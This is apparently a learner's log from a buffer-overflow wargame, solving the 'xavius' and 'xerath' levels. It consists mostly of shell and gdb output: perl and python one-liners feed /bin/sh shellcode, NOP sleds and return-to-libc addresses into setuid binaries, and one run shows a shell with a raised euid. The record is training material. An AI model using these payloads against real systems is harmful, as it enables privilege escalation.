Passing the input to stdin through cat was correct to begin with, and after 팝렛 hyung hinted that I should use strace and I got a feel for it, I tried the attack, but not even a segmentation fault came up. Hmm, I definitely put in 48 bytes. And another odd thing: I wondered whether the shellcode was the problem, so I tried the shellcode from the write-up. (I borrowed Sanguine hyung's shellcode for a bit.) Take a look at the log.
[nightmare@localhost nightmare]$ bash2
[nightmare@localhost nightmare]$
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x12, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"' ; cat)|./xerath
¸ù¿@P1P¸@PP@
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x28,"\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x01\x50\x01\x40"';cat)|./xavius
¸ù¿@P1P¸@PP@
[nightmare@localhost nightmare]$
[nightmare@localhost nightmare]$
[nightmare@localhost nightmare]$
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x28,"\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x01\x50\x01\x40"';cat)|./xavius
¸ù¿@P1P¸@PP@
ㅁㄴㅇ
/bin/sh: ㅁㄴㅇ: command not found
ㄹmy-pass
/bin/sh: ㄹmy-pass: command not found
my-pass
euid = 519
throw me away
q
/bin/sh: q: command not found
exit
exit
As I kept hitting Enter it ended up like that..? Then a little later I tried again:
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x28, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"' ; cat)|./xerath
¸ù¿@P1P¸@PP@
[nightmare@localhost nightmare]$
??
..and while writing this up, I realized..
the difference between "' ; cat) and "';cat)..
Ugh....
But actually, that doesn't seem to be the problem. It is some kind of formatting issue, but I'm not sure it's the whitespace..?
But it doesn't work with other shellcode. Why is that? Does 0x2f maybe not get through when passed over a pipe?
Anyway, glad it's solved! It looked completely hopeless when I first saw it, but it's solved.
[nightmare@localhost nightmare]$ ./xerath
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccc
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccc
Segmentation fault (core dumped)
[nightmare@localhost nightmare]$ gdb -q xerath core
Core was generated by `./xerath'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x40077f72 in memcmp () from /lib/libc.so.6
(gdb) ni
The program is not being run.
(gdb) list
1 memcmp: No such file or directory.
(gdb) x/wx 0x40077f72
0x40077f72 <memcmp+18>: 0x0474a6f3
(gdb) ls
Undefined command: "ls". Try "help".
(gdb) file x
xavius xavius.c xerath
(gdb) file xerath
Load new symbol table from "xerath"? (y or n) y
Reading symbols from xerath...done.
(gdb) disas main
Dump of assembler code for function main:
0x8048714 <main>: push %ebp
0x8048715 <main+1>: mov %esp,%ebp
0x8048717 <main+3>: sub $0x2c,%esp
0x804871a <main+6>: mov 0x8049a3c,%eax
0x804871f <main+11>: push %eax
0x8048720 <main+12>: push $0x100
0x8048725 <main+17>: lea 0xffffffd8(%ebp),%eax
0x8048728 <main+20>: push %eax
0x8048729 <main+21>: call 0x8048408 <fgets>
0x804872e <main+26>: add $0xc,%esp
0x8048731 <main+29>: lea 0xffffffd8(%ebp),%eax
0x8048734 <main+32>: push %eax
0x8048735 <main+33>: push $0x80488bb
0x804873a <main+38>: call 0x8048438 <printf>
0x804873f <main+43>: add $0x8,%esp
0x8048742 <main+46>: cmpb $0xbf,0x7(%ebp)
0x8048746 <main+50>: jne 0x8048760 <main+76>
0x8048748 <main+52>: push $0x80488bf
0x804874d <main+57>: call 0x8048438 <printf>
0x8048752 <main+62>: add $0x4,%esp
0x8048755 <main+65>: push $0x0
0x8048757 <main+67>: call 0x8048458 <exit>
0x804875c <main+72>: add $0x4,%esp
0x804875f <main+75>: nop
0x8048760 <main+76>: cmpb $0x8,0x7(%ebp)
0x8048764 <main+80>: jne 0x8048780 <main+108>
0x8048766 <main+82>: push $0x80488e0
0x804876b <main+87>: call 0x8048438 <printf>
0x8048770 <main+92>: add $0x4,%esp
0x8048773 <main+95>: push $0x0
0x8048775 <main+97>: call 0x8048458 <exit>
0x804877a <main+102>: add $0x4,%esp
0x804877d <main+105>: lea 0x0(%esi),%esi
0x8048780 <main+108>: push $0x4
0x8048782 <main+110>: lea 0xffffffd8(%ebp),%eax
0x8048785 <main+113>: lea 0x2c(%eax),%edx
---Type <return> to continue, or q <return> to quit---
0x8048788 <main+116>: push %edx
0x8048789 <main+117>: lea 0xffffffd4(%ebp),%eax
0x804878c <main+120>: push %eax
0x804878d <main+121>: call 0x8048448 <memcpy>
0x8048792 <main+126>: add $0xc,%esp
0x8048795 <main+129>: push $0x2
0x8048797 <main+131>: push $0x8048902
0x804879c <main+136>: mov 0xffffffd4(%ebp),%eax
0x804879f <main+139>: push %eax
0x80487a0 <main+140>: call 0x8048418 <memcmp>
0x80487a5 <main+145>: add $0xc,%esp
0x80487a8 <main+148>: mov %eax,%eax
0x80487aa <main+150>: test %eax,%eax
0x80487ac <main+152>: jne 0x80487b0 <main+156>
0x80487ae <main+154>: jmp 0x80487e0 <main+204>
0x80487b0 <main+156>: mov 0xffffffd4(%ebp),%eax
0x80487b3 <main+159>: cmpb $0xc9,(%eax)
0x80487b6 <main+162>: jne 0x80487d8 <main+196>
0x80487b8 <main+164>: mov 0xffffffd4(%ebp),%eax
0x80487bb <main+167>: inc %eax
0x80487bc <main+168>: cmpb $0xc3,(%eax)
0x80487bf <main+171>: jne 0x80487d8 <main+196>
0x80487c1 <main+173>: push $0x8048920
0x80487c6 <main+178>: call 0x8048438 <printf>
0x80487cb <main+183>: add $0x4,%esp
0x80487ce <main+186>: push $0x0
0x80487d0 <main+188>: call 0x8048458 <exit>
0x80487d5 <main+193>: add $0x4,%esp
0x80487d8 <main+196>: incl 0xffffffd4(%ebp)
0x80487db <main+199>: jmp 0x8048795 <main+129>
0x80487dd <main+201>: lea 0x0(%esi),%esi
0x80487e0 <main+204>: push $0x2c
0x80487e2 <main+206>: push $0x0
0x80487e4 <main+208>: lea 0xffffffd8(%ebp),%eax
0x80487e7 <main+211>: push %eax
0x80487e8 <main+212>: call 0x8048468 <memset>
0x80487ed <main+217>: add $0xc,%esp
---Type <return> to continue, or q <return> to quit---
0x80487f0 <main+220>: lea 0xffffffd8(%ebp),%eax
0x80487f3 <main+223>: mov $0xbfffffcf,%edx
0x80487f8 <main+228>: mov %edx,%ecx
0x80487fa <main+230>: sub %eax,%ecx
0x80487fc <main+232>: mov %ecx,%eax
0x80487fe <main+234>: push %eax
0x80487ff <main+235>: push $0x0
0x8048801 <main+237>: lea 0xffffffd8(%ebp),%eax
0x8048804 <main+240>: lea 0x30(%eax),%edx
0x8048807 <main+243>: push %edx
0x8048808 <main+244>: call 0x8048468 <memset>
0x804880d <main+249>: add $0xc,%esp
0x8048810 <main+252>: push $0xb90
0x8048815 <main+257>: push $0x0
0x8048817 <main+259>: lea 0xffffffd8(%ebp),%eax
0x804881a <main+262>: lea 0xfffff448(%eax),%edx
0x8048820 <main+268>: push %edx
0x8048821 <main+269>: call 0x8048468 <memset>
0x8048826 <main+274>: add $0xc,%esp
0x8048829 <main+277>: leave
0x804882a <main+278>: ret
0x804882b <main+279>: nop
0x804882c <main+280>: nop
0x804882d <main+281>: nop
0x804882e <main+282>: nop
0x804882f <main+283>: nop
End of assembler dump.
(gdb) b main
Breakpoint 1 at 0x804871a
(gdb) b *main+140
Breakpoint 2 at 0x80487a0
(gdb) b *main+277
Breakpoint 3 at 0x8048829
(gdb) r
Starting program: /home/nightmare/xerath
Breakpoint 1, 0x804871a in main ()
(gdb) c
Continuing.
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccc
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccc
Breakpoint 2, 0x80487a0 in main ()
(gdb) x/40wx $esp
0xbffffad0: 0x63636363 0x08048902 0x00000002 0x63636363
0xbffffae0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffffaf0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffffb00: 0x61616161 0x61616161 0x62626262 0x63636363
0xbffffb10: 0x0000000a 0xbffffb54 0xbffffb5c 0x40013868
0xbffffb20: 0x00000001 0x08048480 0x00000000 0x080484a1
0xbffffb30: 0x08048714 0x00000001 0xbffffb54 0x08048398
0xbffffb40: 0x0804885c 0x4000ae60 0xbffffb4c 0x40013e90
0xbffffb50: 0x00000001 0xbffffc4a 0x00000000 0xbffffc61
0xbffffb60: 0xbffffc83 0xbffffc8d 0xbffffc9b 0xbffffcba
(gdb) x/40wx $esp-80
0xbffffa80: 0x40010c27 0x40014680 0x00000007 0x4000a74e
0xbffffa90: 0x401081ec 0x4000ae60 0xbffffb54 0x40013ed0
0xbffffaa0: 0x080481f4 0x0804998c 0x0804827b 0x4001c5b0
0xbffffab0: 0xbffffb08 0x4000a970 0xbffffb0c 0x00000400
0xbffffac0: 0x4000ae60 0xbffffb54 0xbffffb08 0x08048792
0xbffffad0: 0x63636363 0x08048902 0x00000002 0x63636363
0xbffffae0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffffaf0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffffb00: 0x61616161 0x61616161 0x62626262 0x63636363
0xbffffb10: 0x0000000a 0xbffffb54 0xbffffb5c 0x40013868
(gdb)
0xbffffb20: 0x00000001 0x08048480 0x00000000 0x080484a1
0xbffffb30: 0x08048714 0x00000001 0xbffffb54 0x08048398
0xbffffb40: 0x0804885c 0x4000ae60 0xbffffb4c 0x40013e90
0xbffffb50: 0x00000001 0xbffffc4a 0x00000000 0xbffffc61
0xbffffb60: 0xbffffc83 0xbffffc8d 0xbffffc9b 0xbffffcba
0xbffffb70: 0xbffffccc 0xbffffce4 0xbffffd03 0xbffffd22
0xbffffb80: 0xbffffd2d 0xbffffd3b 0xbffffd80 0xbffffd95
0xbffffb90: 0xbffffdaa 0xbffffdba 0xbffffdc9 0xbffffdea
0xbffffba0: 0xbffffdf5 0xbffffe06 0xbffffe1a 0xbffffe22
0xbffffbb0: 0x00000000 0x00000003 0x08048034 0x00000004
(gdb)
0xbffffbc0: 0x00000020 0x00000005 0x00000006 0x00000006
0xbffffbd0: 0x00001000 0x00000007 0x40000000 0x00000008
0xbffffbe0: 0x00000000 0x00000009 0x08048480 0x0000000b
0xbffffbf0: 0x00000206 0x0000000c 0x00000206 0x0000000d
0xbffffc00: 0x00000206 0x0000000e 0x00000206 0x00000010
0xbffffc10: 0x0fabfbff 0x0000000f 0xbffffc45 0x00000000
0xbffffc20: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc30: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc40: 0x00000000 0x38366900 0x682f0036 0x2f656d6f
0xbffffc50: 0x6867696e 0x72616d74 0x65782f65 0x68746172
(gdb)
0xbffffc60: 0x53454c00 0x45504f53 0x2f7c3d4e 0x2f727375
0xbffffc70: 0x2f6e6962 0x7373656c 0x65706970 0x2068732e
0xbffffc80: 0x55007325 0x4e524553 0x3d454d41 0x53494800
0xbffffc90: 0x5a495354 0x30313d45 0x48003030 0x4e54534f
0xbffffca0: 0x3d454d41 0x61636f6c 0x736f686c 0x6f6c2e74
0xbffffcb0: 0x646c6163 0x69616d6f 0x4f4c006e 0x4d414e47
0xbffffcc0: 0x696e3d45 0x6d746867 0x00657261 0x4f4d4552
0xbffffcd0: 0x4f484554 0x313d5453 0x312e3239 0x312e3836
0xbffffce0: 0x00312e30 0x4c49414d 0x61762f3d 0x70732f72
0xbffffcf0: 0x2f6c6f6f 0x6c69616d 0x67696e2f 0x616d7468
(gdb)
0xbffffd00: 0x4d006572 0x54484341 0x3d455059 0x36383369
0xbffffd10: 0x6465722d 0x2d746168 0x756e696c 0x6e672d78
0xbffffd20: 0x45540075 0x783d4d52 0x6d726574 0x534f4800
0xbffffd30: 0x50595454 0x33693d45 0x50003638 0x3d485441
0xbffffd40: 0x7273752f 0x636f6c2f 0x622f6c61 0x2f3a6e69
0xbffffd50: 0x3a6e6962 0x7273752f 0x6e69622f 0x73752f3a
0xbffffd60: 0x31582f72 0x2f365231 0x3a6e6962 0x6d6f682f
0xbffffd70: 0x696e2f65 0x6d746867 0x2f657261 0x006e6962
0xbffffd80: 0x454d4f48 0x6f682f3d 0x6e2f656d 0x74686769
0xbffffd90: 0x6572616d 0x504e4900 0x43525455 0x74652f3d
(gdb)
0xbffffda0: 0x6e692f63 0x72747570 0x48530063 0x3d4c4c45
0xbffffdb0: 0x6e69622f 0x7361622f 0x53550068 0x6e3d5245
0xbffffdc0: 0x74686769 0x6572616d 0x53414200 0x4e455f48
0xbffffdd0: 0x682f3d56 0x2f656d6f 0x6867696e 0x72616d74
0xbffffde0: 0x622e2f65 0x72687361 0x414c0063 0x653d474e
0xbffffdf0: 0x53555f6e 0x54534f00 0x3d455059 0x756e696c
0xbffffe00: 0x6e672d78 0x57500075 0x682f3d44 0x2f656d6f
0xbffffe10: 0x6867696e 0x72616d74 0x48530065 0x3d4c564c
0xbffffe20: 0x534c0032 0x4c4f435f 0x3d53524f 0x303d6f6e
0xbffffe30: 0x69663a30 0x3a30303d 0x303d6964 0x34333b31
(gdb)
0xbffffe40: 0x3d6e6c3a 0x333b3130 0x69703a36 0x3b30343d
0xbffffe50: 0x733a3333 0x31303d6f 0x3a35333b 0x343d6462
0xbffffe60: 0x33333b30 0x3a31303b 0x343d6463 0x33333b30
0xbffffe70: 0x3a31303b 0x303d726f 0x35303b31 0x3b37333b
0xbffffe80: 0x6d3a3134 0x31303d69 0x3b35303b 0x343b3733
0xbffffe90: 0x78653a31 0x3b31303d 0x2a3a3233 0x646d632e
0xbffffea0: 0x3b31303d 0x2a3a3233 0x6578652e 0x3b31303d
0xbffffeb0: 0x2a3a3233 0x6d6f632e 0x3b31303d 0x2a3a3233
0xbffffec0: 0x6d74622e 0x3b31303d 0x2a3a3233 0x7461622e
0xbffffed0: 0x3b31303d 0x2a3a3233 0x3d68732e 0x333b3130
(gdb)
0xbffffee0: 0x2e2a3a32 0x3d687363 0x333b3130 0x2e2a3a32
0xbffffef0: 0x3d726174 0x333b3130 0x2e2a3a31 0x3d7a6774
0xbfffff00: 0x333b3130 0x2e2a3a31 0x3d6a7261 0x333b3130
0xbfffff10: 0x2e2a3a31 0x3d7a6174 0x333b3130 0x2e2a3a31
0xbfffff20: 0x3d687a6c 0x333b3130 0x2e2a3a31 0x3d70697a
0xbfffff30: 0x333b3130 0x2e2a3a31 0x31303d7a 0x3a31333b
0xbfffff40: 0x3d5a2e2a 0x333b3130 0x2e2a3a31 0x303d7a67
0xbfffff50: 0x31333b31 0x622e2a3a 0x303d327a 0x31333b31
0xbfffff60: 0x622e2a3a 0x31303d7a 0x3a31333b 0x7a742e2a
0xbfffff70: 0x3b31303d 0x2a3a3133 0x6d70722e 0x3b31303d
(gdb)
0xbfffff80: 0x2a3a3133 0x6970632e 0x31303d6f 0x3a31333b
0xbfffff90: 0x706a2e2a 0x31303d67 0x3a35333b 0x69672e2a
0xbfffffa0: 0x31303d66 0x3a35333b 0x6d622e2a 0x31303d70
0xbfffffb0: 0x3a35333b 0x62782e2a 0x31303d6d 0x3a35333b
0xbfffffc0: 0x70782e2a 0x31303d6d 0x3a35333b 0x6e702e2a
0xbfffffd0: 0x31303d67 0x3a35333b 0x69742e2a 0x31303d66
0xbfffffe0: 0x3a35333b 0x6f682f00 0x6e2f656d 0x74686769
0xbffffff0: 0x6572616d 0x7265782f 0x00687461 0x00000000
0xc0000000: Cannot access memory at address 0xc0000000
(gdb)
0xc0000004: Cannot access memory at address 0xc0000004
(gdb) x/40wx $esp-500
0xbffff8dc: 0x40029b0e 0xbffff9b0 0x400081e6 0x40029ad5
0xbffff8ec: 0x40029ad5 0x40013868 0x00000000 0x40000b4f
0xbffff8fc: 0x000015d5 0x000000bd 0x00000000 0x7f1c0300
0xbffff90c: 0x40000544 0x40029b0e 0xbffff9e4 0x400081e6
0xbffff91c: 0x40029ad5 0x40029ad5 0x40013868 0x400143e0
0xbffff92c: 0x00001839 0x4001c460 0x400145ec 0x06568b74
0xbffff93c: 0xbffff9c0 0x40023667 0x4001c460 0x400143e0
0xbffff94c: 0x00000001 0x00001840 0x40020ca0 0x400145e4
0xbffff95c: 0x00000000 0xbffff9e4 0x4001c5b0 0x00000184
0xbffff96c: 0x40021fd0 0x40001402 0xbffffa44 0x40008134
(gdb)
0xbffff97c: 0x40000ec9 0x40023713 0x40013868 0x400143e0
0xbffff98c: 0x00001743 0x40029b0e 0xbffffa64 0x400081e6
0xbffff99c: 0x40029ad5 0x40029ad5 0x40029b0e 0xbffffa78
0xbffff9ac: 0x400081e6 0x40029ad5 0x080482f2 0x40013868
0xbffff9bc: 0x40013ed0 0x00000027 0x0000001a 0x00000000
0xbffff9cc: 0x40000824 0x00007080 0x40013c00 0x00000003
0xbffff9dc: 0x00000000 0x00000003 0x40023809 0x00000708
0xbffff9ec: 0x40021fd0 0x08048264 0x400143e0 0x4001c5b0
0xbffff9fc: 0x00000184 0x40021fd0 0x4001ad70 0x400143e0
0xbffffa0c: 0x00000003 0x40014650 0x00000001 0xbffffa30
(gdb)
0xbffffa1c: 0x080481f4 0x400140d4 0x073c3a79 0xbffffaac
0xbffffa2c: 0x0804827b 0x4001c5b0 0x400143e0 0x400143e0
0xbffffa3c: 0xbffffae1 0x40015001 0xbffffa7c 0x4000a7fd
0xbffffa4c: 0x400143d0 0x400146b0 0x00000007 0x4000a74e
0xbffffa5c: 0x401081ec 0x401068c0 0xbffffa9c 0x4000a7fd
0xbffffa6c: 0x400143d0 0x400146b0 0x00000007 0xbffffab0
0xbffffa7c: 0x4000a7fd 0x40010c27 0x40014680 0x00000007
0xbffffa8c: 0x4000a74e 0x401081ec 0x4000ae60 0xbffffb54
0xbffffa9c: 0x40013ed0 0x080481f4 0x0804998c 0x0804827b
0xbffffaac: 0x4001c5b0 0xbffffb08 0x4000a970 0xbffffb0c
(gdb)
0xbffffabc: 0x00000400 0x4000ae60 0xbffffb54 0xbffffb08
0xbffffacc: 0x08048792 0x63636363 0x08048902 0x00000002
0xbffffadc: 0x63636363 0x61616161 0x61616161 0x61616161
0xbffffaec: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffffafc: 0x61616161 0x61616161 0x61616161 0x62626262
0xbffffb0c: 0x63636363 0x0000000a 0xbffffb54 0xbffffb5c
0xbffffb1c: 0x40013868 0x00000001 0x08048480 0x00000000
0xbffffb2c: 0x080484a1 0x08048714 0x00000001 0xbffffb54
0xbffffb3c: 0x08048398 0x0804885c 0x4000ae60 0xbffffb4c
0xbffffb4c: 0x40013e90 0x00000001 0xbffffc4a 0x00000000
(gdb)
(gdb)
(gdb)
(gdb) q
The program is running. Exit anyway? (y or n) y
[nightmare@localhost nightmare]$ man2 execve
bash2: man2: command not found
[nightmare@localhost nightmare]$ man 2 execve
[nightmare@localhost nightmare]$ man 2 brk
[nightmare@localhost nightmare]$ man 2 old_mmap
No entry for old_mmap in section 2 of the manual
[nightmare@localhost nightmare]$ man old_mmap
No manual entry for old_mmap
[nightmare@localhost nightmare]$ man 2 oldmmap
No entry for oldmmap in section 2 of the manual
[nightmare@localhost nightmare]$ man 2 mmap
[nightmare@localhost nightmare]$ man 2 mmap
[nightmare@localhost nightmare]$
[nightmare@localhost nightmare]$ man 2 open
[nightmare@localhost nightmare]$
[nightmare@localhost nightmare]$ man 2 read
[nightmare@localhost nightmare]$
[nightmare@localhost nightmare]$ strace ./xerath
execve("./xerath", ["./xerath"], [/* 22 vars */]) = 0
brk(0) = 0x8049a58
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000
open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0
old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40015000
close(3) = 0
open("/lib/libc.so.6", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0755, st_size=4101324, ...}) = 0
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\210\212"..., 4096) = 4096
old_mmap(NULL, 1001564, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x40018000
mprotect(0x40105000, 30812, PROT_NONE) = 0
old_mmap(0x40105000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0xec000) = 0x40105000
old_mmap(0x40109000, 14428, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40109000
close(3) = 0
mprotect(0x40018000, 970752, PROT_READ|PROT_WRITE) = 0
mprotect(0x40018000, 970752, PROT_READ|PROT_EXEC) = 0
munmap(0x40015000, 12210) = 0
personality(PER_LINUX) = 0
getpid() = 1230
fstat64(0, 0xbffff984) = -1 ENOSYS (Function not implemented)
fstat(0, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000
ioctl(0, TCGETS, {B9600 opost isig icanon echo ...}) = 0
read(0, aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccc
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"..., 1024) = 49
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000
ioctl(1, TCGETS, {B9600 opost isig icanon echo ...}) = 0
write(1, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"..., 49aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccc
) = 49
write(1, "\n", 1
) = 1
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x5, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x16, "\x00\x50\x10\x40"';cat)|./xerath
j
XRh//shh/binRSÍ̀
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x5, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x16, "\x01\x50\x10\x40"';cat)|./xerath
j
XRh//shh/binRSÍ̀P@
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"21, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x01\x50\x10\x40"';cat)|./xerath
Number found where operator expected at -e line 1, near ""\x90"21"
(Missing operator before 21?)
syntax error at -e line 1, near ""\x90"21"
Execution of -e aborted due to compilation errors.
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x21, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x01\x50\x10\x40"';cat)|./xerath
j
XRh//shh/binRSÍ̀P@
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x5, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` ", "\x01\x50\x10\x40"';cat)|./xerath
>
>
>
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x5, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3", "\x01\x50\x10\x40"';cat)|./xerath
hÎh±
SThjohi0chi0tijYþ
IyúA÷TP@
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x2, "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81", "\x01\x50\x10\x40"';cat)|./xerath
^1ɱ2l uöê 2Qi00tii0cjoQT⚱
P@
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x200, "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81", "\x01\x50\x10\x40"';cat)|./xerath
^1ɱ2l uöê 2Qi00tii0cjoQT⚱
P@
[nightmare@localhost nightmare]$ (perl -e 'print "\xe0\x8a\x05\x40", "AAAA", "BBBB", "\x01\x50\x10\x40"';cat)|./xerath
@AAAABBBBP@
[nightmare@localhost nightmare]$ vi foo.c
[nightmare@localhost nightmare]$ gcc foo.c -o foo
foo.c: In function `main':
foo.c:5: warning: assignment makes pointer from integer without a cast
[nightmare@localhost nightmare]$ ./foo
0x400fbff9
[nightmare@localhost nightmare]$ (perl -e 'print "\xe0\x8a\x05\x40", "AAAA", "f9\xbf\x0f\x40", "\x01\x50\x10\x40"';cat)|./xerath
@AAAAf9¿@P@
[nightmare@localhost nightmare]$ (perl -e 'print "\xe0\x8a\x05\x40", "AAAA", "\xf9\xbf\x0f\x40", "\x01\x50\x10\x40"';cat)|./xerath
@AAAAù¿@P@
[nightmare@localhost nightmare]$ (perl -e 'print "\xe0\x8a\x05\x40", "AAAA", "\xf9\xbf\x0f\x40", "\x90"x32, "\x01\x50\x10\x40"';cat)|./xerath
@AAAAù¿@P@
[nightmare@localhost nightmare]$
[nightmare@localhost nightmare]$ (perl -e 'print "a", "\xe0\x8a\x05\x40", "AAAA", "\xf9\xbf\x0f\x40", "\x90"x31, "\x01\x50\x10\x40"';cat)|./xerath
a@AAAAù¿@P@
[nightmare@localhost nightmare]$ ./serath
bash2: ./serath: No such file or directory
[nightmare@localhost nightmare]$ ./xerath
a\xe0\x8a\x05\x40AAAA\xf9\xbf\x0f\x40aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x01\x50\x10\x40
a\xe0\x8a\x05\x40AAAA\xf9\xbf\x0f\x40aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x01\x50\x10\x40
Segmentation fault (core dumped)
[nightmare@localhost nightmare]$ ./gdb -q core
bash2: ./gdb: No such file or directory
[nightmare@localhost nightmare]$ ./gdb -q -c core
bash2: ./gdb: No such file or directory
[nightmare@localhost nightmare]$ gdb -q -c core
Core was generated by `./xerath'.
Program terminated with signal 11, Segmentation fault.
#0 0x40077f72 in ?? ()
(gdb) x/40wx $esp
0xbffffad8: 0x4000ae60 0x080487a5 0x61616161 0x08048902
0xbffffae8: 0x00000002 0x61616161 0x65785c61 0x38785c30
0xbffffaf8: 0x30785c61 0x34785c35 0x41414130 0x66785c41
0xbffffb08: 0x62785c39 0x30785c66 0x34785c66 0x61616130
0xbffffb18: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffffb28: 0x61616161 0x61616161 0x61616161 0x3130785c
0xbffffb38: 0x3035785c 0x3031785c 0x3034785c 0x0000000a
0xbffffb48: 0xbffffb64 0x08048398 0x0804885c 0x4000ae60
0xbffffb58: 0xbffffb5c 0x40013e90 0x00000001 0xbffffc5b
0xbffffb68: 0x00000000 0xbffffc64 0xbffffc78 0xbffffc90
(gdb) x/wx 0x40105000
0x40105000: 0x656e0073
(gdb) p read
No symbol table is loaded. Use the "file" command.
(gdb) file xerath
Reading symbols from xerath...done.
(gdb) b main
Breakpoint 1 at 0x804871a
(gdb) r
Starting program: /home/nightmare/xerath
Breakpoint 1, 0x804871a in main ()
(gdb) x/wx 0x40105000
0x40105000: 0x656e0073
(gdb) p read
$1 = {<text variable, no debug info>} 0x4000eec0 <__libc_read>
(gdb) q
The program is running. Exit anyway? (y or n) y
[nightmare@localhost nightmare]$ (python -c 'print "\x90"*27 + "\x68\xf9\xbf\x0f\x40\x68\xe0\x91\x03\x40\xb8\xe0\x8a\x05\x40\x50\xc3" + "\x01\x50\x01\x40"'; cat) | ./xavius
hù¿@h@¸@PP@
[nightmare@localhost nightmare]$ $(python -c 'print "A"*44 + "\x10\x84\x04\x08" + "A"*4 + "\xf0\xfa\xff\xbf" +
> "\x66\xfc\xff\xbf"') $(python -c 'print "\xe0\x8a\x05\x40" +
> "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"')
File "<string>", line 1
print "A"*44 + "\x10\x84\x04\x08" + "A"*4 + "\xf0\xfa\xff\xbf" +
^
SyntaxError: invalid syntax
File "<string>", line 1
